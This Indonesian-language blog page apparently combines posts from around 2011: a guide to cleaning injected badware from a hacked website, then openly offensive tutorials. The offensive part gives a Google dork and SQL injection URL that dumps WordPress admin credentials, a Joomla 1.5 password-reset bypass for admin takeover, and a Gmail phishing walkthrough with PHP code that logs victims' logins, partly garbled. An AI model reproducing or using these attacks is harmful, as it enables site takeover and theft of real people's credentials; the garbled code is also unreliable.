Java Script Injection, sesuai dengan namanya juga, maka tentu saja menyerang file hosting yang berekstensi JS. Kode script yang telah menginfeksi file .js menggunakan kode Eval yang sama/mirip seperti yang menyerang pada file-file berektensi PHP.
*Catatan: x = sengaja kode-kode tersebut saya ganti dengan huruf “x” ini, karena kalau tidak, maka halaman blog saya ini akan dicuriga sebagai halaman blog atau website yang mengandung perangkat lunak yang membahayakan bagi pengguna internet (dicurigai mengandung malicious scripts/malware atau secara umum disebut dengan istilah badware)
Injeksi sript tersebut bertujuan untuk menanamkan backlink kepada halaman situs jeremyjacksonevents.com/celebs/rumble66.php secara ilegal. Dan setiap kali kita membuka halaman website/blog kita, maka link ke halaman situs tersebut ikut terbaca pada saat loading.
Cara mengatasinya kasus nomor 2 ini adalah dengan memeriksa satu persatu file-file hosting berektensi .HTML, .PHP, dan .JS di server hosting, lalu kita hapus script beserta kode-kode aneh yang dideteksi sebagai badware pada file-file tersebut.  Misalnya kalau pada kasus yang saya alami badware tersebut menginfeksi file-file seperti index.html, readme.html, googlegooglef130xxxx29ffa9ed.html (kode verifikasi Google), serta file-file berektensi .html dan .htm lainnya, index.php, wp-setting.php, wp-config, sampel.php, wpconfig.php, postinfo.html, functions.php, page-index.php, script.js, dan penambahan file berekstensi .php di folder images yaitu bernama gifimg.php yang bisa langsung dihapus.
Tetapi karena file-file tersebut tentu saja akan banyak jumlahnya, dan kita pun akan kerepotan untuk memeriksa satu persatu, maka cara yang bisa dilakukan adalah dengan:
  • Untuk keamanan, gantilah terlebih dahulu password akun cPanel hostingnya.
  • Untuk blog di WordPress.org, ganti pula password untuk masuk ke dashboarnya.
  • Pastikan di komputer terpasang antivirus yang updated, dan pastikan komputer telah terbebas dari virus.
  • Download semua folder dan file dari server hosting ke komputer (bisa menggunakan FileZilla)
  • Untuk mengetahui file apa saja yang terinfeksi, maka scan semua folder dan file yang telah didowload, dan jangan sampai file-file yang terdeteksi mengandung badware tersebut langsung dihapus/didelete oleh antivirus, tetapi biarkan masuk ke chest/quarantine, supaya nanti kita bisa melihat file-file manakah yang terinfeksi dan harus kita perbaiki.
  • Setelah scanning selesai, maka periksa chest/quarantine. Lihat file-file apa saja yang terinfeksi dan harus diperbaiki atau dihilangkan badwarenya tersebut.
  • Untuk menghilangkan badware di file-file tadi, kita bisa merestore satu persatu file dari chest/quarantine ke folder asalnya untuk kemudian dihilangkan kode-kode badwarenya lalu diupload pada folder yang sama di server. Tetapi kalau takut akan resiko komputer terinfeksi atau antivirus selalu mengembalikannya ke chest/quarantie, maka kita bisa langsung menghapus kode-kode badware di file-file yang sama di server hosting.
  • Jika menemukan file-file asing yang sebelumnya tidak ada di server seperti gifimg.php atau yang lain, maka Anda hapus saja file tadi.
  • Setelah semuanya selesai, maka silahkan akses kembali halaman blog atau website yang kita miliki. Jika antivirus sudah tidak membloknya, maka website kita telah terbebas dari badware. Bila masih membloknya atau masih ada peringatan darinya, berarti masih ada file yang belum bersih dari kode-kode badware.
Bila antivirus sudah tidak membloknya, tetapi beberapa browser atau search engine mungkin masih tetap memblok atau memberikan peringatan kepada pengunjung untuk tidak membuka website kita, maka untuk mengatasinya kita harus meminta review keGoogle Webmaster Tools dan StopBadware.org. Setelah mereka mereviewnya serta memastikan website/blog kita telah terbebas dari badware, maka biasanya hanya dalam beberapa jam saja website/blog kita sudah terbebas dari pemblokan serta tidak dianggap membahayakan lagi oleh browser dan search engine.
3. Pada saat pengunjung blog dialihkan (redirecting) dari mesin pencari ke sebuah situs tertentu.
Cara mengatasi redirecting seperti ini sangat mudah, yaitu:
  • Cek kode-kode pada file HTACCES dan wp-config.php di server hosting menggunakan Filezilla versi terbaru. Dan tidak perlu memeriksanya di melalui cPanel, karena biasanya kode-kode badwarenya disembunyikan (hidden).
  • Bila pada file tersebut terdapat kode-kode badware seperti kode Eval tersebut di atas, maka hapuslah kode tersebut.
  • Kunjungi blog kita melalui search engine. Bila kita benar-benar telah berhasil menghapus kode badwarenya, maka blog kita pun telah terbebas dari redirecting.
Sahabat-sahabat, cukup ini saja dulu pengalaman yang bisa saya bagikan mengenai cara mengatasi hack dan badware. Di artikel-artikel RumahCahaya yang akan datang, insya Allah saya pun akan memberikan langkah-langkah apa saja sih.. yang harus kita lakukan guna mencegah atau setidaknya meminimalisir website atau blog kita dari upaya-upaya hacking, script injection, iframe injection, dan sebagainya.
Semoga bermanfaat..!!!


Cara Mengatasi Serangan Hacking pada Website

Setelah sebelumnya kita telah belajar mengenai jenis-jenis hacking yang umum terjadi, (Jenis Hacking yang Umum Menyerang Website) kini anda telah siap untuk beranjak ke materi baru. Yaitu bagaimana mengatasi serangan hacking pada website. Simak langkah-langkah berikut untuk menanggulangi serangan hacking pada website anda :
1) Login ke cPanel, pastikan ’Last Login From’ tercantum IP publik anda
Langkah pertama adalah mengecek pada bagian “Last login from” melalui panel kontrol anda.  Pastikan harus selalu tercantum alamat IP publik dari mana terakhir kali anda melakukan login. Bagaimana cara menemukan IP publik kita? Cara termudah adalah dengan membuka situs domain checker semacam http://who.is. Biasanya tepat pada portalnya akan muncul tulisan Your IP is 183.7.xxx.xxx. Itulah alamat IP publik anda. Kembali lagi jika pada “Last login from” tercantum alamat IP lain yang tidak anda ketahui, catat. Hal ini berbahaya sebab logikanya jika alamat IP lain bisa login ke kontrol panel kita, berarti mereka memiliki username, password, dan semua akses ke situs kita. Dan inilah indikasi awal bahwa website kita mendapat serangan.
2) Menyalakan fitur Log Archiving
Website akses log menyimpan rekaman mendetail tentang siapa yang melakukan koneksi ke situs kita, baik melalui HTTP (pengunjung normal) maupun melalui FTP (transfer file). Umumnya, log tersebut dihapus setiap harinya. Padahal peranan akses log sangatlah penting. Agar akses log tidak terhapus, lakukan langkah berikut:
1. Login ke cPanel > Raw Log Manager
2. Cek pada kotak “Archive Logs”.
3. Uncek pada kotak “Remove the previous month’s archived logs”
4. Klik Save
Dengan demikian Archive Log akan memaksa setiap log agar disimpan. Jika Archive Log dinyalakan maka setiap traffic akses akan terekam, termasuk serangan. Dan percayalah, dengan mempelajarinya akan berguna bagi anda untuk melakukan evaluasi sekuriti website anda.
3) Langkah darurat; segera offline kan website anda
Jika halaman anda terinfeksi virus yang memiliki kemungkinan virus tersebut bisa menyerang pengunjung situs anda, maka segera lindungi pengunjung anda dan juga reputasi anda. Yaitu dengan membuat website anda berstatus offline. Bisa dengan menambahkan beberapa baris kode pada .htaccess, maupun mengupload tampilan halaman under construction. Jika anda melakukannya dengan segera, anda memiliki kemungkinan untuk menghindarkan situs anda mendapat predikat “This site may harm your computer” dari Google. Selain itu, penyerang biasanya telah menginstal backdoor script pada halaman index anda yang memungkinkan mereka untuk kembali ke server anda. Menetapkan status offline pada situs anda sementara, sedikitnya memiliki kemungkinan untuk mengunci dan membuat penyerang tidak bisa masuk melalui backdoor yang telah diinstal.
4) Semua administrators situs melakukan scan pada PC masing-masing
Fakta bahwa di tahun 2009, penyebab nomor satu dari hacking website adalah PC webmaster yang terinfeksi oleh malware. Malware semacam gumblar, dan martuz (yang telah kita bahas pada edisi sebelumnya, red.) bertindak sebagai jembatan dalam mencuri informasi login FTP dan mengirimkannya ke komputer remote. Komputer remote inilah yang kemudian menyuntik halaman website korban dengan JavaScript atau iframes tersembunyi yang mengarahkan pengunjung website korban ke website berbahaya yang menyimpan gumblar dan martuz lainnya. Untuk menghindarinya, pastikan setiap orang yang memiliki akses password ke website anda melakukan setidaknya dua kali scan antivirus dan antispyware pada local komputer masing-masing dengan scanner yang bervariasi. Karena selama PC webmaster terinfeksi, mengubah password situs tidak akan berpengaruh sama sekali. Bukankah password baru dengan mudah dapat dicuri lagi?
5) Ganti semua password anda
Setelah PC administrator bebas dari virus dan spyware, gantilah semua password yang berhubungan dengan situs anda. Panel kontrol, FTP, koneksi database, email akun, dan halaman administrator anda. Pergunakan kombinasi password yang kuat. Yaitu password yang tidak mudah ditembus karena mengandung kombinasi kata, angka, dan karakter yang rumit.
6) Upgrade semua third party script ke versi terbaru
Sesuai yang pernah kita bahas pada edisi sebelumnya bahwa serangan semacam Remote File Inclusion (RFI) memanfaatkan vulnerability pada script versi lama dari script third party kita untuk menyusup ke dalam situs kita. Dan satu-satunya cara untuk menangkal serangan RFI ini adalah menggunakan versi terbaru dari script third party yang telah memiliki kekebalan terhadap RFI. Baik plugin, addon website hingga Content Management System (CMS) anda, segera upgrade ke versi terbaru. Jika anda menggunakan CMS semacam Joomla maupun WordPress, anda bisa mengikuti perkembangan rilis terbaru melalui situs resmi masing-masing CMS yang anda pakai. Update versi WordPress bisa dicek melalui wordpress.org, Joomla pada joomla.org, dan sebagainya. Cek juga situs secunia.com, sebuah situs yang berisi laporan sekuriti setiap third party script. Halaman situs secunia.com mendaftar kerentanan yang ditemukan pada plugin atau addon. Dengan mengecek di halaman tersebut, anda mengetahui apakah third party script yang anda pergunakan aman atau terdapat vulnerability di dalamnya.
7) Cek kode PHP anda untuk menemukan lubang sekuriti
Jika anda mencurigai bahwa script yang anda tulis sendiri mungkin saja memiliki kerentanan sekuriti, cara teraman adalah dengan berhenti mempergunakan script tersebut hingga anda telah memeriksanya dengan sangat teliti. Setelah membuat kopian lokal untuk anda sendiri, hapus scriptnya dari server. Karena selama script masih ada di dalamnya, setiap orang yang telah mengetahui letak lubang sekuritinya tetap bisa mengakses dan mengeksploitasinya.
8 ) Temukan dan perbaiki semua script berbahaya yang anda temukan
Anda bisa mengidentifikasi file apa yang dihack dengan mengecek setiap file mencurigakan melalui File Manager di cPanel anda. File yang mencurigakan memiliki kriteria sebagai berikut:
  • Halaman dengan tanggal modifikasi lebih baru dari terakhir kali anda menyimpannya.
  • File baru dengan nama dan lokasi yang mencurigakan. Beberapa hack menginstal file dengan nama seperti hacked.html atau vulnerable.php, dan sebagainya. Nama lainnya mungkin hanya tersusun secara acak. Beberapa file terinstal di lokasi yang membuatnya tampak mencurigakan, misal sebuah file .php di dalam folder /images. Jika anda menemukan file-file tersebut, cek tanggalnya dan cari file lain dengan tanggal yang sama untuk menemukan file apa saja yang mungkin terinfeksi. Sayangnya, anda tidak bisa begitu saja menghapus semua file yang bukan milik anda. Beberapa adalah file sistem yang belum pernah anda ketahui sebelumnya. Jika anda ragu, lakukan pencarian Google dengan nama file tersebut, atau post sebuah pertanyaan pada forum tertentu.
  • Cek direktori root anda (“/”) dan subdirektorinya untuk menemukan file yang berbahaya. Bahkan jika anda menghapus semua konten di public_html anda dan mempublish ulang situs anda, hal tersebut tidak akan menulis ulang direktori diatas dan setara public_html. Untuk itulah anda perlu melakukan pengecekan manual pada area root direktori juga.
Ada lagi cara termudah untuk memperbaiki situs kita jika kita tidak memiliki kemampuan koding yang mumpuni. Yaitu dengan mereplace website kita dengan backup segar yang kita ketahui bersih. Tetapi dengan melakukannya sama saja dengan menghancurkan bukti yang mungkin kita perlukan untuk menemukan bagaimana serangan terjadi dan bagaimana cara mencegahnya terjadi lagi. Untuk itu sebelumnya anda bisa membuat kopian dari situs yang dihack, sehingga bisa anda pelajari kemudian.
9) Cek bahwa file atau permission folder anda sudah secure
Melalui File Manager, pastikan permission dari folder dan file anda sudah sebagaimana mestinya. 755 untuk folder, dan 644 untuk file. Permission seperti 777 dan 666 yang identik dengan world-writable harus dicurigai. Jika anda menemukan permission world-writable pada sebuah file atau folder, segera lakukan pengecekan karena di sanalah area dimana penyerang bisa mengoprek halaman tersebut dengan mudah. Jika anda tidak menemukan alasan yang sangat kuat mengapa harus melonggarkan permission pada suatu file atau folder, maka rapatkan kembali permissionnya menjadi 755 atau 644.
10) Ganti lagi semua password anda
Untuk menghindari seseorang “mengintip” ke dalam situs kita ketika kita melakukan penggantian password sebelumnya, maka setelah memastikan situs kita bersih, lakukan penggantian password kembali. Tentunya tetap dengan mempergunakan kombinasi serumit mungkin.
11) Blok akses IP yang menyerang anda
Setelah anda mengetahui IP yang melakukan login tanpa izin seperti pada langkah pertama dan kedua pada artikel ini, blok akses terhadap IP tersebut melalui salah satu fitur IP Deny Manager di cPanel.
12) Pentingkah untuk melaporkan penyerang secara legal?
Hacking adalah pelanggaran terhadap aturan dan layanan semua webhosting ataupun ISP. Jika anda bisa membuktikan secara akurat bahwa seseorang menggunakan sebuah IP address tertentu untuk melakukan hacking, anda dapat melaporkan insiden ini kepada webhosting atau ISP dengan harapan bahwa mereka akan menutup akun pelaku. Tetapi biar bagaimanapun, bahkan jika anda berhasil, sama saja seperti membunuh seekor semut. Karena faktanya bahwa  perharinya terdapat jutaan request berbahaya yang diluncurkan kepada jutaan website oleh ribuan server berbahaya. Jika satu server dimatikan, tidak berpengaruh apapun terhadap penyerang. Toh mereka masih memiliki ribuan server lainnya. Daripada menghabiskan waktu untuk membalas dengan melaporkan penyerang kepada pihak berwajib, ada baiknya kita meluangkan waktu kita untuk terus meningkatkan pendalaman mengenai ilmu sekuriti website kita. Dan meningkatkan kesadaran bahwa setiap saat pasti akan ada gelombang besar serangan terhadap website kita.

Kamis, 17 November 2011

Exploit Wordpress Blogs

Dork: inurl:"fbconnect_action=myhome"
Klik situs Targetnya
Sekarang ubah URL :
?fbconnect_action=myhome&userid=

Dengan URL ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z ​0mbyak,7,8,9,10,11,12+from+wp_users--

Sekarang keluar Username dan Password Admin.

Encrypt Password MD5 (Blowfish) dengan software yang ada di sini
http://www.easy-share.com/1917245768/passwordspro.zip

Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php



Hack Joomla Versi 1.5.X dengan com_user

Yapzzz langsung aja lahh..gak usah lama2...

oke, yang kita cari disini adalah joomla versi 1.5
dork yang dipake yaitu option=com_user
nanti kalau sudah dapat target, misalkan targetnya adalah :

http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_u...w=register
atau
http://target.com/index.php?option=com_user&view=login
atau
http://target.com/index.php?option=com_user&view=remind


maka yang harus dilakukan adalah mengganti view dengan mengganti view=reset dan layout=confirm
jadi contohnya adalah :
http://target.com/index.php?option=com_u...ut=confirm

nah... dari situ nantinya akan keluar form token, ngga perlu bingung kalo ngga tau harus input apa,
tinggal masukin kutip satu (') , kalau web tersebut belom di patch, maka akan masuk kedalam menu reset password

tinggal masukin aja deh password yang diinginkan, beres.

oke, tahap selanjutnya adalah dengan masuk kedalam menu administrator, misalkan http://target.com/administrator

nah, tinggal masukin deh username "admin" atau "administrator" dan password dengan password yang barusan diganti tadi.
selesai.

gampang kan ?
ayo, majukan kemampuan hacker indonesia !!!

PHISING TUTORIAL

Phishing Tutorial

Phishing adalah proses mencuri informasi sensitif, seperti

username, password, dan informasi bank, dengan berpura-pura menjadi seseorang
Anda tidak. Contoh ini akan jika Anda menerima dan e-mail dari seorang hacker
berpura-pura menjadi bank Anda. Dalam e-mail, ia dapat memberitahu Anda bahwa Anda perlu untuk
memperbarui account Anda sebelum kadaluarsa, dan kemudian hacker menyediakan Icon_charly_link_green. Setelah
Anda klik pada Icon_charly_link_green, Anda tiba di sebuah website yang terlihat persis seperti Anda yang sebenarnya
bank halaman. Pada kenyataannya itu hanya replika yang sempurna, dan ketika anda masukan login
rincian, itu mengirimnya ke email hacker atau toko di server web nya. Hacker yang
menciptakan yang terbaik, paling menipu halaman web phishing yang berpengetahuan di
daerah HTML dan pemrograman PHP. Di bawah ini saya akan menunjukkan contoh sederhana
beberapa langkah-langkah hacker yang dibutuhkan untuk membuat situs web phishing. Dengan melihat
langkah hacker akan ambil, akan membantu Anda mempertahankan diri dari serangan itu.

1. Pertama hacker memilih target. Yang paling populer target phishing

serangan layanan e-mail seperti Hotmail dan Gmail karena mereka
yang paling umum dan sekali hacker mendapatkan akses ke e-mail Anda, dia juga
mendapat akses ke memuat informasi pengguna lainnya untuk semua situs-situs lain
Anda gunakan. Dalam contoh ini kita akan berpura-pura hacker memilih Gmail sebagai nya
target.

2. Setelah memilih targetnya, hacker akan pergi ke situs web dan menyimpan

Seluruh halaman utama. Saya menggunakan Mozilla Firefox, (sangat merekomendasikan menggunakan
browser untuk keamanan dan kustomisasi) Jadi saya akan pergi ke.
http://www.gmail.com
dan klik File -> halaman Simpan sebagai ..., atau cukup tekan + S
yang melakukan ini secara otomatis. Pilih mana Anda ingin menyimpan
halaman web dan tekan Simpan.




3. Setelah Anda memilikinya disimpan, mengubah nama ServiceLogin.htm untuk index.htm. The

alasan Anda ingin nama "index" begitu ketika Anda meng-upload ke web
host dan seseorang pergi ke Icon_charly_link_green, halaman indeks adalah halaman pertama yang
muncul.

4. Selanjutnya hacker akan membuat script PHP untuk melakukan perbuatan kotor nya

menguatkan informasi Anda. Di bawah ini adalah script PHP sederhana yang log dan
menyimpan informasi login Anda ketika Anda klik "Sign in". Untuk melihat cara kerjanya,
copy dan paste kode berikut ke notepad. Selanjutnya simpan ke dalam
direktori yang sama seperti Anda menyimpan halaman Gmail, dan nama itu phish.php. Dalam
Selain ke halaman phish.php, membuat file teks baru kosong dan beri nama list.txt.
PHP Code:
<?php // This marks the beginning of the PHP script. 

PHP Code:
Header(“Location:https://www.google.com/accounts/Serv...=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.co m%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=defa ult&ltmplcac
he
=2 â€œ); // once you click â€œSign in” in the fake website, this redirectsyou to the real Gmail websitemaking the whole process look more
legit


PHP Code:
$handle fopen(“list.txt”“a”); // this tells the server to open the file“list.txt” and get it ready for appending dataWhich in this case is your
username 
and password


PHP Code:
Foreach($_GET as $variable => $value) {
    
fwrite($handle$variable);
    
fwrite($handle“=”);
    
fwrite($handle$value);
    
fwrite($handle“rn”);
    } 
// This section simply assigns all the information going through
    
this form to a variableThis includes your username and password.
    
Fwrite($handle“rn”); // This writes your details to the file â€œlist.txt”
    
fclose($handle); // This simply closes the connection to the file
    
“list.txt”
    
exit; 
> /? / Marks akhir program PHP.

Sejauh ini anda akan melihat berikut di folder anda:



5. Sekarang hacker harus mengedit halaman Gmail utama untuk menyertakan nya
PHP script. Untuk melihat apa yang akan dilakukan hacker, membuka Gmail utama
halaman yang bernama index.htm dengan notepad.

6. Tekan + F, atau pergi ke Edit -> Find, ketik aksi dan tekan "Find Next".



7. Ini akan menyorot terjadinya pertama dari "tindakan" kata di script
dan Anda harus melihat:

bentuk

PHP Code:
<id "gaia_loginform" action "https: / / www.google.com/accounts/Serv...?service=mail" 

Ada dua "tindakan" kejadian di script jadi pastikan Anda memiliki
yang benar dengan melihat "bentuk id" nama di atas. Ubah Icon_charly_link_green yang
antara action = "" untuk phish.php. Ini akan membuat bentuk tunduk kepada
Anda phish script PHP, bukan ke Google. Setelah Icon_charly_link_green Anda akan melihat
kode:

metode = "post"

Ubah kata "POST" untuk "GET" sehingga terlihat seperti metode = "GET".
Apa yang dilakukan adalah metode GET menyampaikan informasi yang Anda ketik
melalui URL sehingga script PHP dapat log itu.

8. Simpan dan tutup file tersebut.

9. Selanjutnya hacker akan meng-upload file hingga hosting yang gratis yang
mendukung PHP. Dengan pencarian Google sederhana Anda bisa datang dengan
banyak yang termasuk dalam kategori ini.

10. Setelah semua file di-upload, Anda harus memberikan izin tertulis kepada
"List.txt" file. Setiap perusahaan hosting harus memiliki pilihan CHMOD berikutnya
ke setiap file. Pilih opsi ini dan mengubah izin file untuk
"List.txt" ke 777. Jika Anda tidak bisa mengetahui bagaimana melakukan ini, mintalah orang-orang yang
menggunakan host yang sama atau hanya sesuatu yang mirip dengan Google:
"Yourwebhostname chmod".

11. Setelah semuanya dan siap untuk pergi, pergi ke host anda disediakan Icon_charly_link_green
Anda untuk website Anda dan Anda akan melihat replika halaman Gmail. Ketik
username / password dan klik Daftar masuk ini seharusnya diarahkan Anda
ke halaman Gmail nyata.
12. Sekarang pergi melihat file list.txt Anda dengan pergi melalui file hosting Anda
manajer atau akan
http://www.yourwebhosturl.com/youraccount/list.txt. Meskipun ini
yang paling umum web host yang anda gunakan dapat memberikan yang berbeda
mencari URL. Sekarang jika saya menaruh nama pengguna dari "myusername" dan password
dari "mypassword" kemudian "list.txt" sekarang akan tampak seperti berikut:


PHP Code:
ltmpl = defaultltmplcache 2
terus 
http://mail.google.com/mail/?service mail
rm
-palsu
Email 
username
Passwd 
mypassword
rmShown 
1
signin 
Masuk
AST 

Seperti yang Anda lihat jika Anda jatuh hacker ini akan memiliki email Anda dan
sandi. Scary, eh? hehehehe

 
./BoeimCyber © 2011 Templates | Boeim